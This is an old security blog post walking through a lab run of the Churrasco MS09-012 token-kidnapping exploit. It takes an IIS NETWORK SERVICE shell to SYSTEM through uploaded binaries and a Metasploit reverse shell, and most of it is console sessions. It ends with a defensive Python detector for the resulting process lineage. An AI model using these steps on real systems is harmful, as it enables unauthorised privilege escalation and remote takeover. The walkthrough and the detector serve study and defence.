Monday, May 10, 2010

Playing with the MS09-012 Windows Local Exploit


Back in '09 there was a buzz about the token kidnapping research by Argeniss:
http://www.argeniss.com/research.html

http://www.argeniss.com/research/TokenKidnapping.pdf

It was subsequently patched in MS09-012: http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx

I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...

The gist is that you can run the Churrasco binary and it will execute a command for you as SYSTEM from a NETWORK SERVICE context (the shell privileges you get when exploiting IIS). See the slides for more.

Let's see it in action.

We have our NETWORK SERVICE shell; we push up the Churrasco binary and a Metasploit payload, then run it.

*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.
[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv
Upload the exploit binary and your reverse shell binary. I used the WebDAV vuln that got me on the box to upload it as churrasco.bin. NETWORK SERVICE is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E

Directory of C:\Inetpub\wwwroot

05/10/2010 06:53 AM .
05/10/2010 06:53 AM ..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah
C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
On the multi/handler side...
[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)


(C) Copyright 1985-2003 Microsoft Corp.

C:\Inetpub\wwwroot>whoami
whoami
nt authority\system

C:\Inetpub\wwwroot>^Z
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] 192.168.6.94:443 -> 192.168.6.94:62854
2 meterpreter NT AUTHORITY\SYSTEM @ LAB 192.168.6.94:443 -> 192.168.6.94:62855

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
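From the defender's side, the run above leaves a distinctive footprint in process-creation telemetry: a process running as SYSTEM whose direct parent still runs as NETWORK SERVICE, with both images sitting in a web-writable directory under an IIS worker lineage. The following is an added example (not from the original post) that applies that check to constructed Sysmon-style records; the PIDs, paths and the list of web-writable directories are assumptions.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    user: str    # account the new process runs as
    image: str   # full path of the executable

SYSTEM = r"nt authority\system"
LOW_PRIV_SERVICES = {r"nt authority\network service", r"nt authority\local service"}
# Assumption: directories a web-facing process can typically write to
WEB_WRITABLE = (r"c:\inetpub\wwwroot", r"c:\windows\temp")

# Constructed sample events modelled on the session in the post (PIDs/paths are made up)
SAMPLE_EVENTS = [
    ProcEvent(1200, 600,  r"NT AUTHORITY\NETWORK SERVICE", r"c:\windows\system32\inetsrv\w3wp.exe"),
    ProcEvent(3872, 1200, r"NT AUTHORITY\NETWORK SERVICE", r"c:\windows\system32\cmd.exe"),
    ProcEvent(4010, 3872, r"NT AUTHORITY\NETWORK SERVICE", r"c:\inetpub\wwwroot\churrasco.bin"),
    ProcEvent(4020, 4010, r"NT AUTHORITY\SYSTEM",          r"c:\inetpub\wwwroot\shell.bin"),
    ProcEvent(800,  4,    r"NT AUTHORITY\SYSTEM",          r"c:\windows\system32\services.exe"),
    ProcEvent(900,  800,  r"NT AUTHORITY\SYSTEM",          r"c:\windows\system32\svchost.exe"),
]

def ancestry_images(proc, by_pid, depth=8):
    """Join image paths up the parent chain (bounded so pid reuse cannot loop forever)."""
    chain = []
    while proc is not None and depth > 0:
        chain.append(proc.image.lower())
        proc = by_pid.get(proc.ppid)
        depth -= 1
    return "|".join(chain)

def find_token_elevations(events):
    """Return (child, parent, reasons) for every SYSTEM process whose direct parent ran as a
    low-privilege service account. A service account normally cannot mint a SYSTEM process
    itself, so this lineage is what a command run under a stolen token looks like."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None or ev.user.lower() != SYSTEM:
            continue
        if parent.user.lower() not in LOW_PRIV_SERVICES:
            continue
        reasons = ["SYSTEM child of %s" % parent.user]
        for proc in (ev, parent):          # extra reasons raise the priority of the alert
            if proc.image.lower().startswith(WEB_WRITABLE):
                reasons.append("image in web-writable dir: " + proc.image)
        if "\\inetsrv\\" in ancestry_images(parent, by_pid):
            reasons.append("descends from IIS worker process")
        hits.append((ev, parent, reasons))
    return hits
```

The benign services.exe/svchost.exe pair is not flagged because its parent already runs as SYSTEM; only the shell.bin child of churrasco.bin matches.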
CG

1 comment:

CG said...

jduck brought up a good point that if a box is vuln to MS09-012 then it's also vuln to KiTrap0d and you can just go that route without uploading anything special.